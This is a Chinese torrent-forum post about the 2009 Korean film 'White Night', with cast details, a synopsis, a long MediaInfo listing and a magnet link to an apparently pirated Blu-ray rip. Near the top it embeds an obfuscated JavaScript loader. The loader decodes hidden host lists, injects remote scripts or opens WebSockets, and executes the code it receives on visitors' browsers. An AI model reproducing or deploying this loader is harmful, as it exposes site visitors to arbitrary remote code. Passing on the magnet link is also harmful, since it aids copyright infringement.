白夜行[中文字幕].White.Night.2009.BluRay.1080p.x265.10bit.DD/5.1.MNHD 8.28GB

版主小s 21天前 415

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 白夜行 / 白夜行:走进白色的黑夜 / Into The White Night
◎片  名 ??? : ?? ?? ?? ??
◎年  代 2009
◎产  地 韩国
◎类  别 爱情 / 悬疑
◎语  言 韩语
◎上映日期 2009-11-19(韩国)
◎IMDb链接 https://www.imdb.com/title/tt1533114/
◎豆瓣评分 7.0/10 (55589人评价)
◎豆瓣链接 https://movie.douban.com/subject/3822842/
◎片  长 135分钟
◎导  演 朴信宇 Shin-woo Park (id:1325629)
◎编  剧 东野圭吾 Keigo Higashino (id:1006330)
       朴信宇 Shin-woo Park (id:1325629)
◎演  员 孙艺珍 Ye-jin Son (id:1014295)
       韩石圭 Suk-kyu Han (id:1037285)
       高修 Soo Go (id:1030091)
       李珉廷 Min-jung Lee (id:1275212)
       朱多英 Da-Yeong Ju (id:1339893)
       朴圣雄 Seong-Woong Park (id:1327932)
       李昌旭 Lee Chang-wook (id:1383539)
       郑镇 Jung Jin (id:1385237)
       尹多景 Da-kyung Yoon (id:1398368)
       安秀浩 Soo-ho Ahn (id:1437477)
       方中贤 Joong-hyeon Bang (id:1458537)
       朴镇宇 Park Jin-woo (id:1376719)
       车华妍 Hwa-yeon Cha (id:1338946)
       郑仁基 In-gi Jeong (id:1320459)
       林智奎 Ji-gyu Lim (id:1316444)
       朱雅凛 Ah-reum Joo (id:1459104)
       康佑硕 Woo-Suk Kang (id:1042269)
       曹永旭 Yeong-wook Jo (id:1287735)
       李庸基 Yong-Gi Lee (id:1314650)

◎标  签 孙艺珍 / 东野圭吾 / 韩国 / 韩国电影 / 悬疑 / 白夜行 / 爱情 / 白夜行韩版

◎简  介
  太阳到达最高点的时候,它的影子便消失了。刑警韩东秀(韩石圭 饰)为了证实自己对一起已有定论的杀人案的猜想,致使自己的儿子意外身亡,从此变得意志消沉起来。14年后,一桩杀人案似乎和当年这起案件有着某种联系,当韩东秀再一次开始关注起当年一名被害人的儿子有汉(高修 饰)时,意外认识正在帮助财团老板调查未婚妻柳美皓(孙艺珍 饰)的私家侦探,从私家侦探那里得知这名叫柳皓美的女人正是当年被认为是畏罪自杀的凶手的女儿李佳。当年这两个韩东秀曾经有怀疑过的小孩子如今长大成人,而且又同样因为凶杀案出现在他的周围。在韩东秀的追查过程中,他发现了当年凶杀案以及近期凶杀案的真相,而真相背后,却是一对永远不能在光天化日之下见面的苦恋情侣。                                    
                                影片改编自日本著名推理小说家东野圭吾的同名小说《白夜行》。小说曾在日本被拍成电视剧,并大获成功。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 120899585308110547263498394484871791386 (0x5AF469C4E979E858CC13EECCEA68031A)

  4. Complete name                            : [email protected]Q.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 8.28 GiB

  8. Duration                                 : 2 h 16 min

  9. Overall bit rate                         : 8 712 kb/s

  10. Movie name                               : White Night 2009 BluRay 1080p - FRDS

  11. Encoded date                             : UTC 2021-08-26 02:34:09

  12. Writing application                      : mkvmerge v59.0.0 ('Shining Star') 64-bit

  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover                                    : Yes

  15. Attachments                              : cover.jpg


  16. Video

  17. ID                                       : 1

  18. Format                                   : HEVC

  19. Format/Info                              : High Efficiency Video Coding

  20. Format profile                           : Main [email protected]@High

  21. Codec ID                                 : V_MPEGH/ISO/HEVC

  22. Duration                                 : 2 h 16 min

  23. Bit rate                                 : 7 612 kb/s

  24. Width                                    : 1 920 pixels

  25. Height                                   : 816 pixels

  26. Display aspect ratio                     : 2.35:1

  27. Frame rate mode                          : Constant

  28. Frame rate                               : 23.976 (24000/1001/53354) FPS

  29. Color space                              : YUV

  30. Chroma subsampling                       : 4:2:0

  31. Bit depth                                : 10 bits

  32. Bits/(Pixel*Frame)                       : 0.203

  33. Stream size                              : 7.23 GiB (87%)

  34. Writing library                          : x265 3.5+11-c8905a745:[Windows][MSVC 1929][64 bit] 10bit

  35. Encoding settings                        : cpuid=533541111039 / frame-threads=3 / numa-pools=8 / wpp / pmode / no-pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / total-frames=195650 / level-idc=0 / high-tier=1 / uhd-bd=0 / ref=6 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-eob / no-eos / no-hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=1 / keyint=250 / gop-lookahead=0 / bframes=8 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=100 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / no-hist-scenecut / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=4 / tu-intra-depth=4 / limit-tu=0 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / strong-intra-smoothing / max-merge=5 / limit-refs=0 / no-limit-modes / me=3 / subme=7 / merange=57 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=4 / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=1.50 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=-2 / crqpoffs=-2 / rc=crf / crf=20.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / min-vbv-fullness=50.0 / max-vbv-fullness=80.0 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=1 / aq-strength=1.00 / no-cutree / zone-count=0 / no-strict-cbr / qg-size=8 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default                                  : Yes

  37. Forced                                   : No

  38. Color range                              : Limited

  39. Color primaries                          : BT.709

  40. Transfer characteristics                 : BT.709

  41. Matrix coefficients                      : BT.709


  42. Audio #1

  43. ID                                       : 2

  44. Format                                   : E-AC-3

  45. Format/Info                              : Enhanced AC-3

  46. Commercial name                          : Dolby Digital Plus

  47. Codec ID                                 : A_EAC3

  48. Duration                                 : 2 h 15 min

  49. Bit rate mode                            : Constant

  50. Bit rate                                 : 1 023 kb/s

  51. Channel(s)                               : 6 channels

  52. Channel layout                           : L R C LFE Ls Rs

  53. Sampling rate                            : 48.0 kHz

  54. Frame rate                               : 93.750 FPS (512 SPF)

  55. Compression mode                         : Lossy

  56. Stream size                              : 995 MiB (12%)

  57. Language                                 : Korean

  58. Service kind                             : Complete Main

  59. Default                                  : Yes

  60. Forced                                   : No


  61. Audio #2

  62. ID                                       : 3

  63. Format                                   : Opus

  64. Codec ID                                 : A_OPUS

  65. Duration                                 : 2 h 16 min

  66. Bit rate                                 : 56.7 kb/s

  67. Channel(s)                               : 2 channels

  68. Channel layout                           : L R

  69. Sampling rate                            : 48.0 kHz

  70. Frame rate                               : 50.000 FPS (960 SPF)

  71. Compression mode                         : Lossy

  72. Stream size                              : 55.2 MiB (1%)

  73. Title                                    : Commentary by Director Park Shin-woo, Son Ye-jin and Go Soo

  74. Writing library                          : opusenc from opus-tools 0.2-3-gf5f571b

  75. Language                                 : Korean

  76. Default                                  : No

  77. Forced                                   : No

  78. ENCODER_OPTIONS                          : --bitrate 65


  79. Text #1

  80. ID                                       : 4

  81. Format                                   : ASS

  82. Codec ID                                 : S_TEXT/ASS

  83. Codec ID/Info                            : Advanced Sub Station Alpha

  84. Duration                                 : 2 h 7 min

  85. Bit rate                                 : 48 b/s

  86. Count of elements                        : 1001

  87. Compression mode                         : Lossless

  88. Stream size                              : 45.0 KiB (0%)

  89. Title                                    : CHS

  90. Language                                 : Chinese

  91. Default                                  : Yes

  92. Forced                                   : No


  93. Text #2

  94. ID                                       : 5

  95. Format                                   : ASS

  96. Codec ID                                 : S_TEXT/ASS

  97. Codec ID/Info                            : Advanced Sub Station Alpha

  98. Duration                                 : 2 h 7 min

  99. Bit rate                                 : 48 b/s

  100. Count of elements                        : 1001

  101. Compression mode                         : Lossless

  102. Stream size                              : 45.0 KiB (0%)

  103. Title                                    : CHT

  104. Language                                 : Chinese

  105. Default                                  : Yes

  106. Forced                                   : No


  107. Text #3

  108. ID                                       : 6

  109. Format                                   : PGS

  110. Muxing mode                              : zlib

  111. Codec ID                                 : S_HDMV/PGS

  112. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  113. Duration                                 : 2 h 9 min

  114. Bit rate                                 : 18.4 kb/s

  115. Count of elements                        : 1819

  116. Stream size                              : 17.1 MiB (0%)

  117. Language                                 : Korean

  118. Default                                  : No

  119. Forced                                   : No


  120. Text #4

  121. ID                                       : 7

  122. Format                                   : PGS

  123. Muxing mode                              : zlib

  124. Codec ID                                 : S_HDMV/PGS

  125. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  126. Duration                                 : 2 h 9 min

  127. Bit rate                                 : 21.9 kb/s

  128. Count of elements                        : 1808

  129. Stream size                              : 20.4 MiB (0%)

  130. Language                                 : English

  131. Default                                  : No

  132. Forced                                   : No


  133. Text #5

  134. ID                                       : 8

  135. Format                                   : ASS

  136. Codec ID                                 : S_TEXT/ASS

  137. Codec ID/Info                            : Advanced Sub Station Alpha

  138. Duration                                 : 2 h 8 min

  139. Bit rate                                 : 55 b/s

  140. Count of elements                        : 1017

  141. Compression mode                         : Lossless

  142. Stream size                              : 52.1 KiB (0%)

  143. Language                                 : English

  144. Default                                  : No

  145. Forced                                   : No


  146. Menu

  147. 00:00:00.000                             : Chapter 01

  148. 00:05:13.021                             : Chapter 02

  149. 00:10:00.641                             : Chapter 03

  150. 00:14:18.148                             : Chapter 04

  151. 00:19:46.935                             : Chapter 05

  152. 00:27:13.089                             : Chapter 06

  153. 00:33:34.011                             : Chapter 07

  154. 00:37:48.391                             : Chapter 08

  155. 00:43:09.753                             : Chapter 09

  156. 00:50:15.971                             : Chapter 10

  157. 00:54:51.413                             : Chapter 11

  158. 00:59:33.569                             : Chapter 12

  159. 01:05:41.771                             : Chapter 13

  160. 01:11:45.217                             : Chapter 14

  161. 01:19:15.167                             : Chapter 15

  162. 01:25:32.252                             : Chapter 16

  163. 01:33:26.559                             : Chapter 17

  164. 01:41:51.814                             : Chapter 18

  165. 01:47:42.164                             : Chapter 19

  166. 01:52:52.140                             : Chapter 20

  167. 01:57:40.803                             : Chapter 21

  168. 02:03:35.324                             : Chapter 22

  169. 02:11:12.823                             : Chapter 23

  170. 02:12:42.746                             : Chapter 24




TAGS 悬疑 爱情

磁力链:
  • magnet:?xt=urn:btih:131058C7D2A0675F5A95AB2DD7D27D1BEEB5C1A5
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回